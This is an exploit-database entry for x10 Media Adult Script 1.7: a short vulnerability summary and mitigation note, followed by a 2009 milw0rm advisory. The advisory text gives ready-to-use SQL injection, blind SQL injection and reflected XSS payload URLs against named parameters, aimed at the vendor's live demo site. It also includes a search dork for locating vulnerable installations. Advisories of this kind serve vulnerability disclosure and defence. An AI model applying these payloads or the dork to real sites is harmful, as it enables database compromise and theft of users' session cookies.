x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities

vendor:

x10 Media Adult Script

by:

Moudi

8,8

CVSS

HIGH

SQL Injection, Blind SQL Injection, XSS

89, 89, 79

CWE

Product Name: x10 Media Adult Script

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: YES

Related CWE: N/A

CPE: a:x10media:x10_media_adult_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities

x10 Media Adult Script 1.7 is vulnerable to multiple remote vulnerabilities such as SQL Injection, Blind SQL Injection and XSS. An attacker can exploit these vulnerabilities to gain access to sensitive information stored in the database, execute arbitrary SQL commands, and inject malicious scripts into the web page.

Mitigation:

Input validation should be used to prevent SQL Injection, Blind SQL Injection and XSS attacks. The application should also be tested for these vulnerabilities.

Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [Â»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [Â»] x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities
==============================================================================

	[Â»] Script:             [ x10 Media Adult Script 1.7 ]
	[Â»] Language:           [ PHP ]
        [Â»] Download:           [ http://www.x10media.com/media-script  ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [Â»] Team:               [ EvilWay ]
        [Â»] Dork:               [ Powered By x10media.com ]
        [Â»] Price:              [ $45.99 USD ]
        [Â»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===

[Â»] http://www.site.com/patch/report.php?id=[SQL]

[Â»] http://www.x10media.com/adult/report.php?id=null+union+select+version()

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[Â»] http://www.site.com/patch/report.php?id=[BLIND]

[Â»] http://www.x10media.com/adult/report.php?id=77917 and 1=null+union+select+version()

===[ Exploit XSS + LIVE : vulnerability ]===

[Â»] http://www.site.com/patch/includes/video_ad.php?pic_id=[XSS]
[Â»] http://www.site.com/patch/linkvideos_listing.php?category=[XSS]
[Â»] http://www.site.com/patch/templates/header1.php?id=[XSS]
[Â»] http://www.site.com/patch/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]

[Â»] http://www.x10media.com/adult/includes/video_ad.php?pic_id="><script>alert(document.cookie);</script>
[Â»] http://www.x10media.com/adult/linkvideos_listing.php?category="><script>alert(document.cookie);</script>
[Â»] http://www.x10media.com/adult/templates/header1.php?id="><script>alert(document.cookie);</script>
[Â»] http://www.x10media.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-08-03]